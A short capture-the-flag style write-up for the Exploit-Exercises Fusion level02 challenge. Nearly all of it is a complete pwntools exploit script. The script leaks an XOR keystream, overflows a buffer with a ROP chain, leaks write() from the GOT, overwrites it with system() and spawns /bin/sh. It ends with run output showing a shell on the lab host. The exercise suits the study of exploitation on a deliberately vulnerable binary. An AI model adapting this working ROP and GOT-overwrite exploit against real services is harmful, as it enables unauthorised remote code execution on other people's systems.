[Exploit-Exercise] Fusion level02

Fusion Level02

- There is xor encryption with random value. First getting xor table.

- just ROP!. leaking write() address and get system() address with 'offset'.

- i just use system(). There is another way to get shell. execve()

- Using execve() would be more cleaner and comfortable for making payload.

from pwn import *
 
def send_data(payload):
    s.send("E" + p32(len(payload)) + payload)
 
def leak_xor_table():
    send_data("\x00"*128)
 
    s.recv(1024)
    return s.recv(1024)[-128:]
 
def encrypt(payload, table):
    enc = ""
    for i in range(len(payload)):
        enc += chr(ord(table[i%128])^ord(payload[i]))
    return enc
 
cmd = "/bin/sh\x00"
pppr = 0x80499bd
bss = 0x804b420 + 4
read_plt = 0x8048860
write_plt = 0x80489c0
write_got = 0x804b3dc
write_system = 0x847a0
 
s = remote('192.168.56.136', 20002)
 
s.recv(1024)
 
table = leak_xor_table()
 
payload = "A"*(0x20000 + 0x10)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(cmd))
# read(0, &bss, 8)
 
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
# write(1, write_got, 4)
 
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
# read(0, write_got, 4)
 
payload += p32(write_plt)
payload += "AAAA"
payload += p32(bss)
# write(bss) -> system(bss) # system("/bin/sh")
 
payload = encrypt(payload, table)
 
send_data(payload)
s.recv(1024)
 
recv = 0
while recv < len(payload):
        recv += len(s.recv(65536))
 
s.send("Q")
s.send(cmd)
 
write = u32(s.recv(4))
print "[+] Write  : %s" % hex(write)
system = write - write_system
print "[+] System : %s" % hex(system)
 
s.send(p32(system))
s.interactive()

zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20002: Done
[+] Write  : 0xb77202c0
[+] System : 0xb769bb20
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002